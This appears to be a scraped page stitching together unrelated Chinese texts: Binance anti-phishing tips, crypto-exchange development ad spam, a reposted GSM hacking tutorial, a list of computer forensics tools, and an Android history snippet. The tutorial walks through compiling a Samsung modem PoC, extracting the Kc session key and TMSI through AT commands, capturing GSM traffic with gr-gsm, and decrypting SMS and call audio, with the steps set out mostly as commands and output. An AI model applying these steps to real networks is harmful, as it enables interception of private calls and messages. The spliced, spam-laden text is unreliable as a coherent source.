App、你的2FA密码等。不要进行手机越狱。那样会大大降低安全性。此外，还要保证手机不被丢失，并加上屏幕锁。其它设备也一样。确保他们不会落入他人手中。当心网络诱骗当心网络诱骗。这些行为通常发生在邮件、信息或者社交媒体上，在点击链接后会弹出一个看起来很像币安网站的页面，它会让你输入证件信息等，黑客就可以使用这些信息来进入你真正的币安账户。我们只要谨慎行事就能避免诈骗。不要点击邮件或社交媒体网页中的任何链接。在进入币安网站时手动输入网页地址，或者使用书签。不要和他人共用邮箱。不要在不同网站使用同一邮箱。如果电报群、Instagram上有陌生人（特别是叫CZ或者类似名字的人）突然联系你，一定要当心。总体来说，只要遵循了以上建议，你的币安账户就能获得相对较高的安全性。其它话题诈骗现象层出不穷。诈骗者通过创建虚假社交账号，并让它们看起来像一些明星账号，例如@cz_binance_，然后试着说服你转钱给他们。请记住这个原则：除非这是你的本意，不要给任何人发送资金。在交易时，一定要通过两个不同渠道核实对方真实身份。如果CZ突然联系你，并以一些很有说服力的理由让你转一些代币给他，请立即举报这个账户。如果朋友突然发信息给你，要你发送一些加密货币救急，一定要打电话核实，或者让他们发一个短视频核实。这个时候我们要设想，朋友的即时通讯软件是否有可能被黑，或者手机被偷了。YouTube 欺诈YouTube的诈骗者现在越来越精明了，他们甚至编辑一些CZ在做空投的假视频。看到这些，举报就是了。社会欺诈如果有奖励活动需要你先发送一些代币到某个地址，然后以更多数量返还，不要相信，你不会获得返还的。记住一个简单原则：发送加密货币时一定要谨慎。不要点击邮件中的链接不要点击邮件中的链接，然后在弹出的页面上输入用户名或密码。这一定是一个陷阱。所以，不要在社交媒体网站上点击关注链接，也不要在其弹出的页面进行登陆。要自动把它们看成钓鱼网站。不要理它们就是了。进入常用加密货币交易平台网站时，一定要手动输入网页地址。请记住Binance.com的拼写，或者使用书签。交易所源码丨交易所APP开发正式版丨交易所系统开发技术逻辑分析数字货币交易所开发详情丨数字货币交易所系统开发（详细及逻辑）丨数字货币交易所源码原生交易所开发详情丨原生交易所系统开发（成熟技术）丨原生交易所现成源码部署交易所系统丨交易所系统开发（逻辑及功能）丨交易所开发源码交付秒合约开发原理丨秒合约系统开发（详细规则）丨秒合约源码案例部署永续合约/秒合约/合约交易所开发详情，永续合约/秒合约/合约交易所系统开发技术方案深入分析代币合约流动性质押挖矿分红系统开发实现技术原理及源码部署交易所系统开发如何开发？数字货币交易所系统开发成熟技术案例去中心化交易所系统开发技术原理丨数字货币去中心化交易所系统开发（说明案例）数字货币交易所系统 数字货币交易所系统开发成品案例 数字货币交易所现成源码部署交易所系统开发案例说明丨数字货币交易所系统开发技术方案详情数字货币交易所系统开发方案详细丨数字货币交易所开发成品技术源码合约交易系统设计与开发｜永续合约交易所搭建,合约平台开发｜永续合约交易所开发技术|特点介绍秒合约交易所开发详细丨秒合约交易所系统开发详细及规则丨秒合约交易所系统源码部署海外版数字货币交易所系统开发（逻辑及功能）丨多语言数字货币交易所系统开发（案例及源码）交易所开发成品丨交易所系统开发（演示版）丨交易所APP源码设计区块链交易所开发详细丨区块链交易所系统开发（开发方案）丨区块链交易所源码案例部署数字货币交易所开发详情版丨数字货币交易所系统开发（web3.0技术开发）丨数字货币交易所开发源码成品交易所APP开发功能丨交易所系统开发（成熟及案例）丨交易所系统源码平台DAPP交易所系统开发（开发案例）丨DAPP交易所系统开发（源码及方案）交易所开发成品丨交易所系统开发（演示版）丨交易所APP源码设计区块链交易所开发详细丨区块链交易所系统开发（开发方案）丨区块链交易所源码案例部署Uniswap交易所开发稳定版丨Uniswap交易所系统开发（开发模板）丨Uniswap交易所系统源码案例部署数字货币交易所开发详情版丨数字货币交易所系统开发（web3.0技术开发）丨数字货币交易所开发源码成品交易所APP开发功能丨交易所系统开发（成熟及案例）丨交易所系统源码平台DAPP交易所系统开发（开发案例）丨DAPP交易所系统开发（源码及方案）DAPP数字货币交易所开发逻辑，DAPP数字货币交易所系统开发（案例及源码）

0×00 在文章第一部分 GSM Hacking Part① ：使用SDR扫描嗅探GSM网络 搭建了嗅探GSM流量的环境，在第二部中，我们来讨论如何捕获发短信以及通话过程中的流量，从捕获到的数据中解密提取出短信文字以及通话语音。 0×01 1.1 获取三星漏洞利用代码： 这是三星的Modem interface exposed via USB通过该exp可对设备输入AT指令进行调试（此方法仅适用于：Galaxy Note 3、Galaxy S4、Galaxy S5、Galaxy S6）。 AT 即Attention,AT指令用于终端设备与PC应用之间的连接与通信。 1 wget https://raw.githubusercontent.com/ud2/advisories/master/android/samsung/nocve-2016-0004/usbswitcher.c 1.2 源码编译libusb： 1 2 3 4 5 6 7 wget http://jaist.dl.sourceforge.net/project/libusb/libusb-0.1%20%28LEGACY%29/0.1.12/libusb-0.1.12.tar.gz tar zxvf libusb-0.1.12.tar.gz cd libusb-0.1.12/ ./configure make make install sudo ldconfig 1.3 gcc编译PoC: 1 gcc usbswitcher.c -o switcher -lusb 0×02 获取Kc、TMSI参数 插入三星设备，可以在/dev/ttyACM*中找到它： 2.1 switcher 1 busybox microcom /dev/ttyACM0 1 ./switcher 这一步比较尴尬，需要反复执行才能成功进入交互界面，如果实在不行可以尝试下一种方式，使用minicom： 2.2 minicom 1 minicom -D /dev/ttyACM0 通过AT指令获取Kc\TMSI可参阅：Attacking the Baseband Modem of Mobile Phones to Breach the users’ Privacy and network Security 2.3 Kc GSM系统中的加密也只是指无线路径上的加密，防止BTS和MS之间交换客户信息和客户参数时不被非法个人或团体所得或监听，在鉴权程序中，当客户侧计算SRES三参数组的提供时，同时用另一算法(A8算法)也计算出密钥Kc。根据MSC/VLR发送出的加密命令，BTS侧和MS侧均开始使用Kc。在MS侧，由Kc、TDAM帧号和加密命令M一起经A5算法，对客户信息数据流进行加密，在无线路径上传送。在BTS侧，把从无线信道上收到加密信息数据流、TDMA帧号和Kc，再经过A5算法解密后，传送BSC和MSC。可以通过AT指令获取KC值： 1 AT+CRSM=176.28448,0,0,9 演示视频中，Crazy Danish Hacker获得了该值为：5973237C3E96980303 丢弃最后两位，即：5973237C3E9698033 0×03 信号捕获 3.1 确定当前手机接入基站 手机在连入GSM基站时，我们可通过一些方式确定自己手机连入的是哪个基站、ARFCN是多少，安卓手机在2G状态时，可在键盘拨号界面输入 1 *#*#4636#*#*  上面这个是安卓通用的如果你的手机没反应，还可以尝试 1 2 3 Samsung (Android) : *#*#197328640#*#* or *#0011# iPhone (all) : *3001#12345#*拨号 HTC (Android) : *#*#7262626#*#* 进去以后能找到基站的MCC、MNC、ARFCN这些参数。 MCC 移动国家码 MNC Mobile Network Code，移动网络码，共2位，中国联通GSM系统使用01，中国移动GSM系统使用02 ARFCN 绝对无线频道编号（Absolute Radio Frequency Channel Number – ARFCN ），是在GSM无线系统中，用来鉴别特殊射频通道的编号方案。 手机开机后，即搜索广播控制信道（BCCH）的载频。因为系统随时都向在小区中的各用户发送出用广播控制信息。手机收集到最强的（BCCH）对应的载频频率后，读取频率校正信道（FCCH），使手机（MS）的频率与之同步。所以每一个用户的手机在不同的位置（即不同的小区）的载频是固定的，它是由GSM网络运营商组网时确定，而不是由用户的GSM手机来决定。 手机读取同步信道（SCH）的信息后找出基地站（BTS）的认别码，并同步到超高帧TDMA的帧号上。手机在处理呼叫前要读取系统的信息。如：领近小区的情况、现在所处小区的使用频率及小区是否可以使用移动系统的国家号码和网络号码等等，这些信息都以BCCH上得到。 手机在请求接入信道（RACH）上发出接入请求的信息，向系统传送SIM卡帐号等信息。系统在鉴权合格后，通过允许接入信道（AGCH）使GSM手机接入信道上并分配给GSM手机一个独立专用控制信道（SDCCH）。手机在SDCCH上完成登记。在慢速随路控制信道（SACCH）上发出控制指令。然后手机返回空闲状态，并监听BCCH和CCCH公共控制信道上的信息。 在Part 1 中937.4MHz这个基站的ARFCN为12，本部分假设我们的手机接入的是这个基站，接下来，我们通过SDR捕获这个基站的下行数据包： 3.2 确定当前基站的下行频率： 打开http://www.cellmapper.net/arfcn.php 结果： 1 2 3 4 5 6 7 8 Network Type    GSM (TDMA) E/U/ARFCN    12 Band Name    GSM-900 Uplink Frequency 上行频率 手机到基站 (phone to base station)    892.4 MHz Downlink Frequency  下行频率 基站到手机 (base station to phone)    937.4 MHz Band Number    900 获取Downlink Frequency 下行频率 (base station to phone) ：937.4 MHz 写作：937400000 3.3捕获下行数据包： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 grgsm_capture.py -h linux; GNU C++ version 4.8.4; Boost_105400; UHD_003.010.git-197-g053111dc   Usage: grgsm_capture.py [options]   RTL-SDR capturing app of gr-gsm.   Options:   -h, --help            show this help message and exit //打印帮助信息   -f FC, --fc=FC        Set frequency [default=none] //设定捕获数据的中心频率   -a ARFCN, --arfcn=ARFCN  //设定ARFCN                         Set ARFCN instead of frequency. In some cases you may                         have to provide the GSM band also   -g GAIN, --gain=GAIN  Set gain [default=30] //设定gain   -s SAMP_RATE, --samp-rate=SAMP_RATE  //设定采样率 默认2M                         Set samp_rate [default=2M]   -p PPM, --ppm=PPM     Set ppm [default=0]   -b BURST_FILE, --burst-file=BURST_FILE                         File where the captured bursts are saved   -c CFILE, --cfile=CFILE                         File where the captured data are saved   --band=BAND           Specify the GSM band for the frequency. Available                         bands are: P-GSM, DCS1800, PCS1900, E-GSM, R-GSM,                         GSM450, GSM480, GSM850. If no band is specified, it                         will be determined automatically, defaulting to 0.   --args=ARGS           Set device arguments [default=]   -v, --verbose         If set, the captured bursts are printed to stdout   -T REC_LENGTH, --rec-length=REC_LENGTH                         Set length of recording in seconds [default=none] 1 grgsm_capture.py -g 40 -a 12 -s 1000000 -c sms.cfile -T 20 1 2 3 4 5 -g 指定gain参数 40 -a ARFCN 12 -s 设定采样率1M -c 将捕获到的数据存入sms.cfile -T 设定时间 命令执行后可以用另外一部手机给接入ARFCN 12基站的手机打电话、发短信，这样我们就实现了捕获通话过程中的语音、短信数据包。 1 ls -lah sms.cfile 捕获到数据包后再次查看KC、TMSI，确定这两个数值没有改变。 0×04 信号解码 捕获完数据以后再次获取KC TMSI值： 1 minicom -D /dev/ttyACM0 4.1 KC: 1 AT+CRSM=176.28448,0,0,9 演示视频中输出结果为：5973237C3E96980303 丢弃最后两位，即：5973237C3E969803 4.2 TMSI: 1 AT+CRSM=176.28542,0,0,11 演示视频中输出结果为：9062FF7632F8665610FF00 取其前4bytes,也就是前8字节，即：9062FF76 1 ls -lah voice.cfile 一起来看看解码脚本的用法： decode usage 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 grgsm_decode -h Usage: grgsm_decode: [options]   Options:   -h, --help            show this help message and exit //打印帮助信息   -m CHAN_MODE, --mode=CHAN_MODE                         Channel mode. Valid options are 'BCCH' (Non-combined                         C0), 'BCCH_SDCCH4'(Combined C0), 'SDCCH8' (Stand-alone                         control channel) and 'TCHF' (Traffic Channel, Full                         rate)   -t TIMESLOT, --timeslot=TIMESLOT                         Timeslot to decode [default=0]   -u SUBSLOT, --subslot=SUBSLOT                         Subslot to decode. Use in combination with channel                         type BCCH_SDCCH4 and SDCCH8   -b BURST_FILE, --burst-file=BURST_FILE                         Input file (bursts)   -c CFILE, --cfile=CFILE                         Input file (cfile)   -v, --verbose         If set, the decoded messages (with frame number and                         count) are printed to stdout   -p, --print-bursts    If set, the raw bursts (with frame number and count)                         are printed to stdout     Cfile Options:     Options for decoding cfile input.       -f FC, --fc=FC      Frequency of cfile capture  //指定需解码文件的中心频率 （从哪个频率捕获就填多少）     -a ARFCN, --arfcn=ARFCN  //指定ARFCN 同上，从哪个ARFCN捕获就填多少                         Set ARFCN instead of frequency. In some cases you may                         have to provide the GSM band also     --band=BAND         Specify the GSM band for the frequency. Available                         bands are: P-GSM, DCS1800, PCS1900, E-GSM, R-GSM,                         GSM450, GSM480, GSM850.If no band is specified, it                         will be determined automatically, defaulting to 0.     -s SAMP_RATE, --samp-rate=SAMP_RATE   //指定采样率，默认1M                         Sample rate of cfile capture [default=1M]     --ppm=PPM           Set frequency offset correction [default=0]     Decryption Options:     Options for setting the A5 decryption parameters.       -e A5, --a5=A5      A5 version [default=1]. A5 versions 1 - 3 supported //设定A5加密算法版本     -k KC, --kc=KC      A5 session key Kc. Valid formats are //设定KC值                         '0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF' and                         '1234567890ABCDEF'     TCH Options:     Options for setting Traffic channel decoding parameters.       -d SPEECH_CODEC, --speech-codec=SPEECH_CODEC                         TCH-F speech codec [default=FR]. Valid options are FR,                         EFR, AMR12.2, AMR10.2, AMR7.95, AMR7.4, AMR6.7,                         AMR5.9, AMR5.15, AMR4.75     -o SPEECH_OUTPUT_FILE, --output-tch=SPEECH_OUTPUT_FILE //将解密后的文件另存为                         TCH/F speech output file [default=/tmp/speech.au.gsm]. 在接下来的解码案例中，我们以gr-gsm开源项目的测试数据为例：https://github.com/ptrkrysik/test_data 测试数据已知参数如下： 1 2 3 ARFCN:725 采样率：$((100000000/174)) Kc:0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 1 2 wget https://github.com/ptrkrysik/test_data/raw/master/vf_call6_a725_d174_g5_Kc1EF00BAB3BAC7002.cfile mv vf_call6_a725_d174_g5_Kc1EF00BAB3BAC7002.cfile test.cfile 1 sudo wireshark -i lo 1 grgsm_decode -a 725 -s $((100000000/174)) -m BCCH -t 0 -c test.cfile 在Immediate Assignment中，我们可以确定广播控制信道（HCCH）为： SDCCH、Timeslot:1 使用我们刚刚知道的参数再次解密： 1 grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m SDCCH8 -t 1 在这一步我们解码出的数据包数量比前几步少了很多，我们可以通过Ciphering Mode Command这一栏的数据包确定A5类型: A5算法在1989年由法国人开发，用于GSM系统的序列密码算法。 A5它用于对从电话到基站连接的加密，先后开发了三个版本记作A5/1、A5/2、A5/3，如果没有特别说明，通常所说的A5是指A5/1。 确定了加密算法，再次执行解密脚本： 1 grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m SDCCH8 -t 1 -e 1 -k 0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 在cc Setup这一项，可以看到Calling party BCD number – Calling party number(被叫手机显示的主叫号码): Assignment Command一栏信息如下： 在上面这幅图中我们确定了 CHAN_MODE 为TCHF，Timeslot为5，有了这些信息，我们便能从捕获到的文件中提取出通话语音，其效果类似于通话监听： 1 grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m TCHF -t 5 -e 1 -k 0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 -d FR -o /tmp/test.au.gsm 进入/tmp缓存目录中，已经可以发现一个音频文件了： 安装VLC播放器： 1 2 sudo apt-get install vlc-nox vlc  /tmp/test.au.gsm 耳机了传来歪果仁酸爽“test”的声音。解码出音频的文件：https://pan.baidu.com/s/1i5jn1A1 0×05 refer GSM Sniffing: TMSI & KC Extraction – Software Defined Radio Series #9Voice Decryption 语音解密SMS Decryption 短信解密SMS text messeges and voice calls sniffinghttps://ccdcoe.org/cycon/2015/proceedings/16_xenakis_ntantogian.pdf 原文地址：http://www.freebuf.com/articles/wireless/111577.html 本文转自 K1two2 博客园博客，原文链接： http://www.cnblogs.com/k1two2/p/5804566.html   ，如需转载请自行联系原作者

本文讲的是工具推荐：22款最流行的计算机取证工具【2017年更新版】， 什么是计算机取证？ 计算机取证（Computer Forensics，又名计算机取证技术、计算机鉴识、计算机法医学）是指运用计算机辨析技术，对计算机犯罪行为进行分析以确认罪犯及计算机证据，并据此提起诉讼。也就是针对计算机入侵与犯罪，进行证据获取、保存、分析和出示。计算机证据指在计算机系统运行过程中产生的以其记录的内容来证明案件事实的电磁记录物。从技术上而言。计算机取证是一个对受侵计算机系统进行扫描和破解，以对入侵事件进行重建的过程。可理解为“从计算机上提取证据”即：获取、保存、分析、出示、提供的证据必须可信； 计算机取证在打击计算机和网络犯罪中作用十分关键，它的目的是要将犯罪者留在计算机中的“痕迹”作为有效的诉讼证据提供给法庭，以便将犯罪嫌疑人绳之以法。因此，计算机取证是计算机领域和法学领域的一门交叉科学，被用来解决大量的计算机犯罪和事故，包括网络入侵、盗用知识产权和网络欺骗等。 为了达到更好地研究和调查目的，开发人员已经创建出了很多计算机取证工具。警察部门和调查机构可以根据各种因素选择工具，包括预算以及现有专家队伍状况等。 这些计算机取证工具主要可以分为以下几种不同类别： 磁盘和数据捕获工具； 文件查看器； 文件分析工具； 注册表分析工具； 互联网分析工具； 电子邮件分析工具； 移动设备分析工具； Mac OS分析工具； 网络取证工具； 数据库取证工具； 在接下来的文章中，我们将列举一些最为流行和主流的数据取证工具。在进一步介绍之前，需要指出的是，以下工具是以随机顺序排列，并非代表该工具的当前排名情况： 22款计算机取证工具 1. Digital Forensics Framework Digital Forensics Framework（DFF）是以专用API为基础的一个开源计算机取证平台，具有GPL许可证。它是一个灵活的模块化系统，可以辅助你的数据调查取证工作，包括：访问远程或本地设备、Windows或Linux操作系统的取证、由于错误或崩溃造成的文件恢复、快速搜索文件的元数据以及其他功能等。 此外，DFF还提出了一个替代传统数字取证的解决方案，设计得更简洁，自动化。DFF接口引导用户通过一个主要的数字调查步骤，让用户选择专业模式或者非专业模式来快速进行数字调查以及执行事件响应。 下载地址：http://www.digital-forensic.org/ 2. Open Computer Forensics Architecture Open Computer Forensics Architecture（OCFA）是由荷兰国家警察局负责开发的另一种较为流行的分布式开源计算机取证框架，主要用于自动化数据取证过程。该框架建立在Linux平台上，并使用postgreSQL数据库来存储数据。 下载地址：http://sourceforge.net/projects/ocfa/ 3. CAINE CAINE（Computer Aided Investigative Environment）是用于数字取证的Linux发行版。其作为安全研究部际中心（CRIS）的数字取证项目而创建，旨在填补不同取证工具之间的互操作间隙，提供一致化的图形用户界面以在电子证据的获取和分析过程中对数字调查进行指导，为文档和报告的编写提供一个半自动化的过程。此外，该工具也是开源的。 查看更多：http://www.caine-live.net/ 4. X-Ways Forensics x-ways forensics是由德国X-ways进行研发推出的取证分析软件。它可在 Windows XP/2003/Vista/2008/7/8/8.1/2012操作系统下运行，支持32 /64 位Standard/PE/FE等版本。 此外，X-Ways Forensics 还可随身携带，能够通过U盘在任意Windows操作系统下使用，无需安装。不像其他一些取证分析工具那样，X-ways Forensics不需要使用者设置数据库等繁琐的操作，并且超小化的安装包可以在数秒内下载并安装。它可以与WinHex hex和 disk editor 紧密结合，提供高效率的工作流模型， 这样计算机取证调查员就可以与使用X-Ways Investigator 的调查员共享数据，协同工作。 其主要功能包括： 磁盘克隆和镜像功能，进行完整数据获取； 可分析 RAW/dd/ISO/VHD/VMDK 格式原始数据镜像文件中的完整目录结构，支持分段保存的镜像文件； 可读取磁盘、RAIDs以及超过2TB大的镜像文件（超过 232 个扇区）扇区最大为8KB； 内置解析磁盘阵列JBOD、RAID 0、RAID 5、RAID 5EE、RAID 6、Linux软件磁盘阵列、windows动态磁盘以及LVM2逻辑卷管理器； 自动识别丢失的/已删除的分区； 支持 FAT12、FAT16、FAT32、exFAT、TFAT、NTFS、Ext2、Ext3、Ext4、Next3、CDFS/ISO9660/Joliet、UDF文件系统； 察看并完整获取内存转储，并能获取虚拟内存中的运行进程； 使用多种数据恢复技术，能快速发现需要恢复的数据，并支持碎片级数据恢复； …… 查看更多：http://www.x-ways.net/forensics/ 5. SANS Investigative Forensics Toolkit – SIFT SIFT是一个多用途的取证操作系统，内置数字取证过程中所需的所有必要工具。它建立在Ubuntu上，具有许多与数字取证有关的工具。今年早些时候，SIFT 3.0发布，它分为免费和收费两种版本，并包含免费的开源取证工具。 下载地址：http://digital-forensics.sans.org/community/downloads 6. EnCase Encase是Guidance Software公司研发的取证产品，该工具拥有强大的脚本功能，支持二次开发。可增强取证分析的针对性，使个人技能得到较大程度的发挥，是政府执法机构常用的取证工具，也被广泛的运用与司法、军队、公司监察等部门。 该工具可以快速收集各种设备的数据，挖掘潜在的证据，此外，它还可以根据证据生成报告。不过，该工具属于付费版本，费用为995美元。 查看更多：https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx 7. Registry Recon Registry Recon是一款非常流行的注册表分析工具。它能够从证据中提取注册表信息，然后重建注册表representation。它还可以从当前和以前的Windows安装中重建注册表。 需要注意的是，该工具也属于付费工具，费用为399美元。 查看更多：http://arsenalrecon.com/apps/recon/ 8. The Sleuth Kit Sleuth Kit是一款基于Unix和Windows的工具，可以帮助您对计算机进行取证分析。此外，它还配备了各种有助于数字取证的工具，这些工具具有分析磁盘映像、对文件系统进行深入分析以及其他各种功能。 查看更多：http://www.sleuthkit.org/ 9. Llibforensics Llibforensics是数字取证应用程序库，它是在Python中开发的，并附带各种演示工具来从各种类型的证据中提取信息。 查看更多：http://code.google.com/p/libforensics/ 10. Volatility Volatility是开源的Windows、Linux、MaC以及Android的内存取证分析工具，主要用于事件响应和恶意软件分析。它由python编写而成，使用该工具，你可以从运行进程、网络套接字、网络连接、DLL和注册表配置单元中提取信息。此外，它还支持从Windows故障转储文件和休眠文件中提取信息。 最重要的是，该工具是免费的。 查看更多：http://code.google.com/p/volatility/ 11. WindowsSCOPE WindowsSCOPE是另一款用于分析易失性存储器（volatile memory）的内存取证和逆向工程工具。它主要用于恶意软件的逆向工程，此外，它提供分析Windows内核、驱动程序、DLL、虚拟和物理内存等功能。 查看更多：http://www.windowsscope.com/index.php?page=shop.product_details&flypage=flypage.tpl&product_id=35&category_id=3&option=com_virtuemart 12. The Coroner’s Toolkit The Coroner’s Toolkit（TCT）也是一款很好的数字取证分析工具。它可以运行在几个与Unix相关的操作系统下，它还可以用于帮助分析计算机灾难和数据恢复。 查看更多：http://www.porcupine.org/forensics/tct.html 13. Oxygen Forensic Suite Oxygen Forensic Suite是一款优秀的手机取证软件，并不是只针对非智能手机、智能手机、平板的逻辑分析，对于物理提取及分析也有独特的方法。 它采用底层的通讯协议，支持对手机基本信息、SIM卡信息、联系人列表、组信息、快速拨号、通话记录、短消息、短信中心时间戳、日历、 待办事项、文本便签、照片、视频、音频、LifeBlog 数据 （所有活动，包含地理信息）、Java 程序、手机内存和闪存卡中的文件系统数据、GPRS 和 Wi-Fi 使用记录、 录音文件等信息的获取与恢复。 查看更多：http://www.oxygen-forensic.com/en/features 14. Bulk Extractor Bulk Extractor也是一款非常重要和流行的数字取证工具。它可以扫描文件的磁盘映像、文件本身以及目录来提取有用的信息。在这一过程中，它会忽略文件系统结构，因此它要比其他类似的工具扫描速度快。 它主要被情报和执法机构用于解决网络犯罪等问题方面。 下载地址：http://digitalcorpora.org/downloads/bulk_extractor/ 15. Xplico Xplico是一个开源的网络取证分析工具。它基本功能是从使用Internet和网络协议的应用程序中提取有用的数据。它支持大多数流行协议，包括HTTP、IMAP、POP、SMTP、SIP、TCP、UDP、TCP等。该工具的输出数据存储在MySQL数据库或SQLite数据库中。此外，它也支持IPv4和IPv6。 查看更多：http://www.xplico.org/about 16. Mandiant RedLine Mandiant RedLine是用于内存和文件分析的流行工具。它从内存中收集有关正在运行的进程和驱动程序的信息，并收集文件系统元数据，注册表数据，事件日志，网络信息，服务，任务和Internet历史记录，以帮助构建整体威胁评估配置文件。 当启动RedLine时，将需选择收集数据或分析数据。除非你已经有了一个内存转储文件可用，否则需要创建一个收集器从机器收集数据，直至完成。一旦你有一个内存转储文件，就可以开始分析了。 查看更多：https://www.mandiant.com/resources/download/redline 17. Computer Online Forensic Evidence Extractor (COFEE) Computer Online Forensic Evidence Extractor （COFEE）是一款微软免费提供给国际刑警组织使用的证据提取工具，微软是这样描述的COFEE的： 有了COFEE，没有合适的计算机取证能力的执法机构可以轻松、可靠而且高效地收集现场证据。一个只有最基础的计算机知识的人也可以在不超过10分钟的时间里学会如何使用配置好的COFEE设备，执法人员可以像专家一样收集重要的犯罪证据，其复杂程度就像将USB插入计算机那样。 简单地说，COFEE就是一种是形似U盘的提取工具，COFEE包含了超过150个信息收集、密码破解、网络嗅探等工具，可以快速绕过所有Windows的安全措施，并破解系统密码、显示网络浏览的历史，对电脑系统进行深入地搜索来获取证据。 官网地址：https://cofee.nw3c.org/ 18. P2 eXplorer P2 eXplorer是一款取证图像安装工具，旨在帮助调查人员检查案件。利用该图像，您可以将取证图像作为只读本地和物理光盘，然后使用文件浏览器浏览图像的内容。您也可以轻松查看已删除的数据和图像的未分配空间。 它可以一次安装多个图像，它支持大多数图像格式，包括EnCasem、safeBack、PFR、FTK DD、WinImage、来自Linux DD的RAW图像以及VMWare图像等。此外，它还支持逻辑和物理映像类型。 该工具价格为199美元，当然你也可以免费获取该工具的有限功能版本。 查看更多：https://www.paraben.com/p2-explorer.html 19. PlainSight PlainSight是一个基于Knoppix（Linux发行版）的Live CD（自生系统），它允许用户执行数字取证任务，如查看互联网历史记录，数据刻画，USB设备使用信息收集，检查物理内存转储，提取哈希密码等。 当进入PlainSight时，会弹出一个窗口，要求选择是要执行扫描，加载文件还是运行向导，你需要输入选择以开始数据提取和分析过程。该工具是免费的。 查看更多：http://www.plainsight.info/index.html 20. XRY XRY是Micro Systemation开发的移动取证工具。它用于分析和恢复来自移动设备的关键信息。该工具附带一个硬件设备和软件，硬件可以将手机连接到PC，软件可以对设备进行分析并提取数据。其设计初衷是恢复数据进行取证分析。 该工具的最新版本可以恢复来自Android、iPhone以及BlackBerry等各种智能手机的数据。此外，它还可以收集删除的数据，如通话记录、图像、短信和文本信息等。 查看更多：http://www.msab.com/xry/what-is-xry 21. HELIX3 HELIX3是一款基于live CD（自生系统）的数字取证套件，主要用于事件响应。它配有许多开源数字取证工具，包括十六进制编辑器、数据雕刻以及密码破解工具。 该工具可以从物理内存、网络连接、用户帐户、执行进程和服务、Windows Fegistry、聊天日志、屏幕截图、SAM文件、应用程序、驱动程序、环境变量和Internet历史记录中收集数据。然后根据报告对数据进行分析和评估，以生成符合要求的结果。 免费版本下载地址：https://e-fenseinc.sharefile.com/d/sda4309a624d48b88 企业版下载地址：http://www.e-fense.com/h3-enterprise.php 22. Cellebrite UFED Cellebrite公司的UFED解决方案提供了一个统一的工作流程，允许审查员、调查员和第一响应者在保障移动数据的速度和准确性的情况下，来收集、保护和采取行动。 UFED Pro系列是专为需要最全面、最新的移动数据提取和解码支持的法医审查员和调查员而设计，可用于处理新数据源的涌入。UFED Field系列旨在统一现场和实验室之间的工作流程，使其可以通过车载工作站、笔记本电脑、平板电脑或位于车站的安全自助服务亭查看，访问和共享移动数据。 查看更多：http://www.cellebrite.com/Mobile-Forensics 以上就是本次关于22款计算机取证工具的全部介绍，你还有什么好的取证工具想要推荐上榜，欢迎给我们留言分享。 原文发布时间为：2017年6月12日 本文作者：小二郎 本文来自云栖社区合作伙伴嘶吼，了解相关信息可以关注嘶吼网站。 原文链接

系统简介：Android一词的本义指“机器人”，同时也是Google于2007年11月5日宣布的基于Linux平台的开源手机操作系统的名称，该平台由操作系统、中间件、用户界面和应用软件组成。Android一词最早出现于法国作家利尔亚当（Auguste Villiers de l'Isle-Adam）在1886年发表的科幻小说《未来的夏娃》（L'ève future）中。他将外表像人的机器起名为Android。Android的Logo是由Ascender公司设计的，诞生于2010年，其设计灵感源于男女厕所门上的图形符号，于是布洛克绘制了一个简单的机器人，它的躯干就像锡罐的形状，头上还有两根天线，Android小机器人便诞生了。其中的文字使用了Ascender公司专门制作的称之为“Droid ” 的字体。Android是一个全身绿色的机器人，绿色也是Android的标志。颜色采用了PMS 376C和RGB中十六进制的#A4C639来绘制，这是Android操作系统的品牌象征。有时候，它们还会使用纯文字的Logo。2012年7月美国科技博客网站BusinessInsider评选出二十一世纪十款最重要电子产品，Android操作系统和iPhone等榜上有名。发展历程：2003年10月，安迪·鲁宾等人创建Android公司，并组建Android团队。2005年8月17日，Google低调收购了成立仅22个月的高科技企业Android及其团队。安迪·鲁宾成为Google公司工程部副总裁，继续负责Android项目。2007年11月5日，谷歌公司正式向外界展示了这款名为Android的操作系统，并且在这天谷歌宣布建立一个全球性的联盟组织，该组织由34家手机制造商、软件开发商、电信运营商以及芯片制造商共同组成，并与84家硬件制造商、软件开发商及电信营运商组成开放手持设备联盟（Open Handset Alliance）来共同研发改良Android系统，这一联盟将支持谷歌发布的手机操作系统以及应用软件，Google以Apache免费开源许可证的授权方式，发布了Android的源代码 [2-3]  。2008年，在GoogleI/O大会上，谷歌提出了AndroidHAL架构图，在同年8月18号，Android获得了美国联邦通信委员会（FCC）的批准，在2008年9月，谷歌正式发布了Android 1.0系统，这也是Android系统最早的版本。2009年4月，谷歌正式推出了Android 1.5这款手机，从Android 1.5版本开始，谷歌开始将Android的版本以甜品的名字命名，Android 1.5命名为Cupcake（纸杯蛋糕）。该系统与Android 1.0相比有了很大的改进。2009年9月，谷歌发布了Android 1.6的正式版，并且推出了搭载Android 1.6正式版的手机HTC Hero（G3），凭借着出色的外观设计以及全新的Android 1.6操作系统，HTC Hero（G3）成为当时全球最受欢迎的手机。Android 1.6也有一个有趣的甜品名称，它被称为Donut（甜甜圈）。2010年2月，Linux内核开发者Greg Kroah-Hartman将Android的驱动程序从Linux内核“状态树”（“staging tree”）上除去，从此，Android与Linux开发主流将分道扬镳。在同年5月份，谷歌正式发布了Android 2.2操作系统。谷歌将Android 2.2操作系统命名为Froyo，翻译完名为冻酸奶。2010年10月，谷歌宣布Android系统达到了第一个里程碑，即电子市场上获得官方数字认证的Android应用数量已经达到了10万个，Android系统的应用增长非常迅速。在2010年12月，谷歌正式发布了Android 2.3操作系统Gingerbread 